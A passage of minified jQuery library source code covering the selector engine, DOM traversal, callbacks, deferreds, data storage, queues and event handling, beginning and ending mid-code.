j,k,l,m=[],n=[],o=g.length,p=f||tb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ub(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ub(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?K.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ub(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):I.apply(g,r)})}function wb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=rb(function(a){return a===b},h,!0),l=rb(function(a){return K.call(b,a)>-1},h,!0),m=[function(a,c,d){return!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>i;i++)if(c=d.relative[a[i].type])m=[rb(sb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return vb(i>1&&sb(m),i>1&&qb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&wb(a.slice(i,e)),f>e&&wb(a=a.slice(e)),f>e&&qb(a))}m.push(c)}return sb(m)}function xb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=G.call(i));s=ub(s)}I.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&fb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?hb(f):f}return h=fb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xb(e,d)),f.selector=a}return f},i=fb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&ob(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qb(j),!a)return I.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&ob(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ib(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ib(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||jb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ib(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||jb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ib(function(a){return null==a.getAttribute("disabled")})||jb(L,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fb}(a);m.find=s,m.expr=s.selectors,m.expr[":"]=m.expr.pseudos,m.unique=s.uniqueSort,m.text=s.getText,m.isXMLDoc=s.isXML,m.contains=s.contains;var t=m.expr.match.needsContext,u=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,v=/^.[^:#\[\.,]*$/;function w(a,b,c){if(m.isFunction(b))return m.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return m.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(v.test(b))return m.filter(b,a,c);b=m.filter(b,a)}return m.grep(a,function(a){return m.inArray(a,b)>=0!==c})}m.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?m.find.matchesSelector(d,a)?[d]:[]:m.find.matches(a,m.grep(b,function(a){return 1===a.nodeType}))},m.fn.extend({find:function(a){var b,c=[],d=this,e=d.length;if("string"!=typeof a)return this.pushStack(m(a).filter(function(){for(b=0;e>b;b++)if(m.contains(d[b],this))return!0}));for(b=0;e>b;b++)m.find(a,d[b],c);return c=this.pushStack(e>1?m.unique(c):c),c.selector=this.selector?this.selector+" "+a:a,c},filter:function(a){return this.pushStack(w(this,a||[],!1))},not:function(a){return this.pushStack(w(this,a||[],!0))},is:function(a){return!!w(this,"string"==typeof a&&t.test(a)?m(a):a||[],!1).length}});var x,y=a.document,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=m.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a.charAt(0)&&">"===a.charAt(a.length-1)&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||x).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof m?b[0]:b,m.merge(this,m.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:y,!0)),u.test(c[1])&&m.isPlainObject(b))for(c in b)m.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}if(d=y.getElementById(c[2]),d&&d.parentNode){if(d.id!==c[2])return x.find(a);this.length=1,this[0]=d}return this.context=y,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):m.isFunction(a)?"undefined"!=typeof x.ready?x.ready(a):a(m):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),m.makeArray(a,this))};A.prototype=m.fn,x=m(y);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};m.extend({dir:function(a,b,c){var d=[],e=a[b];while(e&&9!==e.nodeType&&(void 0===c||1!==e.nodeType||!m(e).is(c)))1===e.nodeType&&d.push(e),e=e[b];return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),m.fn.extend({has:function(a){var b,c=m(a,this),d=c.length;return this.filter(function(){for(b=0;d>b;b++)if(m.contains(this,c[b]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=t.test(a)||"string"!=typeof a?m(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&m.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?m.unique(f):f)},index:function(a){return a?"string"==typeof a?m.inArray(this[0],m(a)):m.inArray(a.jquery?a[0]:a,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(m.unique(m.merge(this.get(),m(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){do a=a[b];while(a&&1!==a.nodeType);return a}m.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return m.dir(a,"parentNode")},parentsUntil:function(a,b,c){return m.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return m.dir(a,"nextSibling")},prevAll:function(a){return m.dir(a,"previousSibling")},nextUntil:function(a,b,c){return m.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return m.dir(a,"previousSibling",c)},siblings:function(a){return m.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return m.sibling(a.firstChild)},contents:function(a){return m.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:m.merge([],a.childNodes)}},function(a,b){m.fn[a]=function(c,d){var e=m.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=m.filter(d,e)),this.length>1&&(C[a]||(e=m.unique(e)),B.test(a)&&(e=e.reverse())),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return m.each(a.match(E)||[],function(a,c){b[c]=!0}),b}m.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):m.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(c=a.memory&&l,d=!0,f=g||0,g=0,e=h.length,b=!0;h&&e>f;f++)if(h[f].apply(l[0],l[1])===!1&&a.stopOnFalse){c=!1;break}b=!1,h&&(i?i.length&&j(i.shift()):c?h=[]:k.disable())},k={add:function(){if(h){var d=h.length;!function f(b){m.each(b,function(b,c){var d=m.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&f(c)})}(arguments),b?e=h.length:c&&(g=d,j(c))}return this},remove:function(){return h&&m.each(arguments,function(a,c){var d;while((d=m.inArray(c,h,d))>-1)h.splice(d,1),b&&(e>=d&&e--,f>=d&&f--)}),this},has:function(a){return a?m.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],e=0,this},disable:function(){return h=i=c=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,c||k.disable(),this},locked:function(){return!i},fireWith:function(a,c){return!h||d&&!i||(c=c||[],c=[a,c.slice?c.slice():c],b?i.push(c):j(c)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!d}};return k},m.extend({Deferred:function(a){var b=[["resolve","done",m.Callbacks("once memory"),"resolved"],["reject","fail",m.Callbacks("once memory"),"rejected"],["notify","progress",m.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return m.Deferred(function(c){m.each(b,function(b,f){var g=m.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&m.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?m.extend(a,d):d}},e={};return d.pipe=d.then,m.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&m.isFunction(a.promise)?e:0,g=1===f?a:m.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&m.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;m.fn.ready=function(a){return m.ready.promise().done(a),this},m.extend({isReady:!1,readyWait:1,holdReady:function(a){a?m.readyWait++:m.ready(!0)},ready:function(a){if(a===!0?!--m.readyWait:!m.isReady){if(!y.body)return setTimeout(m.ready);m.isReady=!0,a!==!0&&--m.readyWait>0||(H.resolveWith(y,[m]),m.fn.triggerHandler&&(m(y).triggerHandler("ready"),m(y).off("ready")))}}});function I(){y.addEventListener?(y.removeEventListener("DOMContentLoaded",J,!1),a.removeEventListener("load",J,!1)):(y.detachEvent("onreadystatechange",J),a.detachEvent("onload",J))}function J(){(y.addEventListener||"load"===event.type||"complete"===y.readyState)&&(I(),m.ready())}m.ready.promise=function(b){if(!H)if(H=m.Deferred(),"complete"===y.readyState)setTimeout(m.ready);else if(y.addEventListener)y.addEventListener("DOMContentLoaded",J,!1),a.addEventListener("load",J,!1);else{y.attachEvent("onreadystatechange",J),a.attachEvent("onload",J);var c=!1;try{c=null==a.frameElement&&y.documentElement}catch(d){}c&&c.doScroll&&!function e(){if(!m.isReady){try{c.doScroll("left")}catch(a){return setTimeout(e,50)}I(),m.ready()}}()}return H.promise(b)};var K="undefined",L;for(L in m(k))break;k.ownLast="0"!==L,k.inlineBlockNeedsLayout=!1,m(function(){var a,b,c,d;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="display:inline;margin:0;border:0;padding:1px;width:1px;zoom:1",k.inlineBlockNeedsLayout=a=3===b.offsetWidth,a&&(c.style.zoom=1)),c.removeChild(d))}),function(){var a=y.createElement("div");if(null==k.deleteExpando){k.deleteExpando=!0;try{delete a.test}catch(b){k.deleteExpando=!1}}a=null}(),m.acceptData=function(a){var b=m.noData[(a.nodeName+" ").toLowerCase()],c=+a.nodeType||1;return 1!==c&&9!==c?!1:!b||b!==!0&&a.getAttribute("classid")===b};var M=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,N=/([A-Z])/g;function O(a,b,c){if(void 0===c&&1===a.nodeType){var d="data-"+b.replace(N,"-$1").toLowerCase();if(c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:M.test(c)?m.parseJSON(c):c}catch(e){}m.data(a,b,c)}else c=void 0}return c}function P(a){var b;for(b in a)if(("data"!==b||!m.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;return!0}function Q(a,b,d,e){if(m.acceptData(a)){var f,g,h=m.expando,i=a.nodeType,j=i?m.cache:a,k=i?a[h]:a[h]&&h;
+    if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||m.guid++:h),j[k]||(j[k]=i?{}:{toJSON:m.noop}),("object"==typeof b||"function"==typeof b)&&(e?j[k]=m.extend(j[k],b):j[k].data=m.extend(j[k].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(g[h]){if(b&&(d=c?g[h]:g[h].data)){m.isArray(b)?b=b.concat(m.map(b,m.camelCase)):b in d?b=[b]:(b=m.camelCase(b),b=b in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(a){return a=a.nodeType?m.cache[a[m.expando]]:a[m.expando],!!a&&!P(a)},data:function(a,b,c){return Q(a,b,c)},removeData:function(a,b){return R(a,b)},_data:function(a,b,c){return Q(a,b,c,!0)},_removeData:function(a,b){return R(a,b,!0)}}),m.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=m.data(f),1===f.nodeType&&!m._data(f,"parsedAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=m.camelCase(d.slice(5)),O(f,d,e[d])));m._data(f,"parsedAttrs",!0)}return e}return"object"==typeof a?this.each(function(){m.data(this,a)}):arguments.length>1?this.each(function(){m.data(this,a,b)}):f?O(f,a,m.data(f,a)):void 0},removeData:function(a){return this.each(function(){m.removeData(this,a)})}}),m.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=m._data(a,b),c&&(!d||m.isArray(c)?d=m._data(a,b,m.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=m.queue(a,b),d=c.length,e=c.shift(),f=m._queueHooks(a,b),g=function(){m.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return m._data(a,c)||m._data(a,c,{empty:m.Callbacks("once memory").add(function(){m._removeData(a,b+"queue"),m._removeData(a,c)})})}}),m.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?m.queue(this[0],a):void 0===b?this:this.each(function(){var c=m.queue(this,a,b);m._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&m.dequeue(this,a)})},dequeue:function(a){return this.each(function(){m.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=m.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=m._data(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=["Top","Right","Bottom","Left"],U=function(a,b){return a=b||a,"none"===m.css(a,"display")||!m.contains(a.ownerDocument,a)},V=m.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===m.type(c)){e=!0;for(h in c)m.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,m.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(m(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},W=/^(?:checkbox|radio)$/i;!function(){var a=y.createElement("input"),b=y.createElement("div"),c=y.createDocumentFragment();if(b.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",k.leadingWhitespace=3===b.firstChild.nodeType,k.tbody=!b.getElementsByTagName("tbody").length,k.htmlSerialize=!!b.getElementsByTagName("link").length,k.html5Clone="<:nav></:nav>"!==y.createElement("nav").cloneNode(!0).outerHTML,a.type="checkbox",a.checked=!0,c.appendChild(a),k.appendChecked=a.checked,b.innerHTML="<textarea>x</textarea>",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue,c.appendChild(b),b.innerHTML="<input type='radio' checked='checked' name='t'/>",k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,k.noCloneEvent=!0,b.attachEvent&&(b.attachEvent("onclick",function(){k.noCloneEvent=!1}),b.cloneNode(!0).click()),null==k.deleteExpando){k.deleteExpando=!0;try{delete b.test}catch(d){k.deleteExpando=!1}}}(),function(){var b,c,d=y.createElement("div");for(b in{submit:!0,change:!0,focusin:!0})c="on"+b,(k[b+"Bubbles"]=c in a)||(d.setAttribute(c,"t"),k[b+"Bubbles"]=d.attributes[c].expando===!1);d=null}();var X=/^(?:input|select|textarea)$/i,Y=/^key/,Z=/^(?:mouse|pointer|contextmenu)|click/,$=/^(?:focusinfocus|focusoutblur)$/,_=/^([^.]*)(?:\.(.+)|)$/;function ab(){return!0}function bb(){return!1}function cb(){try{return y.activeElement}catch(a){}}m.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m._data(a);if(r){c.handler&&(i=c,c=i.handler,e=i.selector),c.guid||(c.guid=m.guid++),(g=r.events)||(g=r.events={}),(k=r.handle)||(k=r.handle=function(a){return typeof m===K||a&&m.event.triggered===a.type?void 0:m.event.dispatch.apply(k.elem,arguments)},k.elem=a),b=(b||"").match(E)||[""],h=b.length;while(h--)f=_.exec(b[h])||[],o=q=f[1],p=(f[2]||"").split(".").sort(),o&&(j=m.event.special[o]||{},o=(e?j.delegateType:j.bindType)||o,j=m.event.special[o]||{},l=m.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&m.expr.match.needsContext.test(e),namespace:p.join(".")},i),(n=g[o])||(n=g[o]=[],n.delegateCount=0,j.setup&&j.setup.call(a,d,p,k)!==!1||(a.addEventListener?a.addEventListener(o,k,!1):a.attachEvent&&a.attachEvent("on"+o,k))),j.add&&(j.add.call(a,l),l.handler.guid||(l.handler.guid=c.guid)),e?n.splice(n.delegateCount++,0,l):n.push(l),m.event.global[o]=!0);a=null}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m.hasData(a)&&m._data(a);if(r&&(k=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=_.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=m.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,n=k[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),i=f=n.length;while(f--)g=n[f],!e&&q!==g.origType||c&&c.guid!==g.guid||h&&!h.test(g.namespace)||d&&d!==g.selector&&("**"!==d||!g.selector)||(n.splice(f,1),g.selector&&n.delegateCount--,l.remove&&l.remove.call(a,g));i&&!n.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||m.removeEvent(a,o,r.handle),delete k[o])}else for(o in k)m.event.remove(a,o+b[j],c,d,!0);m.isEmptyObject(k)&&(delete r.handle,m._removeData(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,l,n,o=[d||y],p=j.call(b,"type")?b.type:b,q=j.call(b,"namespace")?b.namespace.split("."):[];if(h=l=d=d||y,3!==d.nodeType&&8!==d.nodeType&&!$.test(p+m.event.triggered)&&(p.indexOf(".")>=0&&(q=p.split("."),p=q.shift(),q.sort()),g=p.indexOf(":")<0&&"on"+p,b=b[m.expando]?b:new m.Event(p,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=q.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:m.makeArray(c,[b]),k=m.event.special[p]||{},e||!k.trigger||k.trigger.apply(d,c)!==!1)){if(!e&&!k.noBubble&&!m.isWindow(d)){for(i=k.delegateType||p,$.test(i+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),l=h;l===(d.ownerDocument||y)&&o.push(l.defaultView||l.parentWindow||a)}n=0;while((h=o[n++])&&!b.isPropagationStopped())b.type=n>1?i:k.bindType||p,f=(m._data(h,"events")||{})[b.type]&&m._data(h,"handle"),f&&f.apply(h,c),f=g&&h[g],f&&f.apply&&m.acceptData(h)&&(b.result=f.apply(h,c),b.result===!1&&b.preventDefault());if(b.type=p,!e&&!b.isDefaultPrevented()&&(!k._default||k._default.apply(o.pop(),c)===!1)&&m.acceptData(d)&&g&&d[p]&&!m.isWindow(d)){l=d[g],l&&(d[g]=null),m.event.triggered=p;try{d[p]()}catch(r){}m.event.triggered=void 0,l&&(d[g]=l)}return b.result}},dispatch:function(a){a=m.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(m._data(this,"events")||{})[a.type]||[],k=m.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=m.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,g=0;while((e=f.handlers[g++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(e.namespace))&&(a.handleObj=e,a.data=e.data,c=((m.event.special[e.origType]||{}).handle||e.handler).apply(f.elem,i),void 0!==c&&(a.result=c)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!=this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(e=[],f=0;h>f;f++)d=b[f],c=d.selector+" ",void 0===e[c]&&(e[c]=d.needsContext?m(c,this).index(i)>=0:m.find(c,this,null,[i]).length),e[c]&&e.push(d);e.length&&g.push({elem:i,handlers:e})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},fix:function(a){if(a[m.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=Z.test(e)?this.mouseHooks:Y.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new m.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=f.srcElement||y),3===a.target.nodeType&&(a.target=a.target.parentNode),a.metaKey=!!a.metaKey,g.filter?g.filter(a,f):a},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button,g=b.fromElement;return null==a.pageX&&null!=b.clientX&&(d=a.target.ownerDocument||y,e=d.documentElement,c=d.body,a.pageX=b.clientX+(e&&e.scrollLeft||c&&c.scrollLeft||0)-(e&&e.clientLeft||c&&c.clientLeft||0),a.pageY=b.clientY+(e&&e.scrollTop||c&&c.scrollTop||0)-(e&&e.clientTop||c&&c.clientTop||0)),!a.relatedTarget&&g&&(a.relatedTarget=g===a.target?b.toElement:g),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==cb()&&this.focus)try{return this.focus(),!1}catch(a){}},delegateType:"focusin"},blur:{trigger:function(){return this===cb()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return m.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):void 0},_default:function(a){return m.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=m.extend(new m.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?m.event.trigger(e,null,b):m.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},m.removeEvent=y.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){var d="on"+b;a.detachEvent&&(typeof a[d]===K&&(a[d]=null),a.detachEvent(d,c))},m.Event=function(a,b){return this instanceof m.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?ab:bb):this.type=a,b&&m.extend(this,b),this.timeStamp=a&&a.timeStamp||m.now(),void(this[m.expando]=!0)):new m.Event(a,b)},m.Event.prototype={isDefaultPrevented:bb,isPropagationStopped:bb,isImmediatePropagationStopped:bb,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=ab,a&&(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=ab,a&&(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=ab,a&&a.stopImmediatePropagation&&a.stopImmediatePropagation(),this.stopPropagation()}},m.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){m.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!m.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),k.submitBubbles||(m.event.special.submit={setup:function(){return m.nodeName(this,"form")?!1:void m.event.add(this,"click._submit keypress._submit",function(a){var b=a.target,c=m.nodeName(b,"input")||m.nodeName(b,"button")?b.form:void 0;c&&!m._data(c,"submitBubbles")&&(m.event.add(c,"submit._submit",function(a){a._submit_bubble=!0}),m._data(c,"submitBubbles",!0))})},postDispatch:function(a){a._submit_bubble&&(delete a._submit_bubble,this.parentNode&&!a.isTrigger&&m.event.simulate("submit",this.parentNode,a,!0))},teardown:function(){return m.nodeName(this,"form")?!1:void m.event.remove(this,"._submit")}}),k.changeBubbles||(m.event.special.change={setup:function(){return X.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(m.event.add(this,"propertychange._change",function(a){"checked"===a.originalEvent.propertyName&&(this._just_changed=!0)}),m.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1),m.event.simulate("change",this,a,!0)})),!1):void m.event.add(this,"beforeactivate._change",function(a){var b=a.target;X.test(b.nodeName)&&!m._data(b,"changeBubbles")&&(m.event.add(b,"change._change",function(a){!this.parentNode||a.isSimulated||a.isTrigger||m.event.simulate("change",this.parentNode,a,!0)}),m._data(b,"changeBubbles",!0))})},handle:function(a){var b=a.target;return this!==b||a.isSimulated||a.isTrigger||"radio"!==b.type&&"checkbox"!==b.type?a.handleObj.handler.apply(this,arguments):void 0},teardown:function(){return 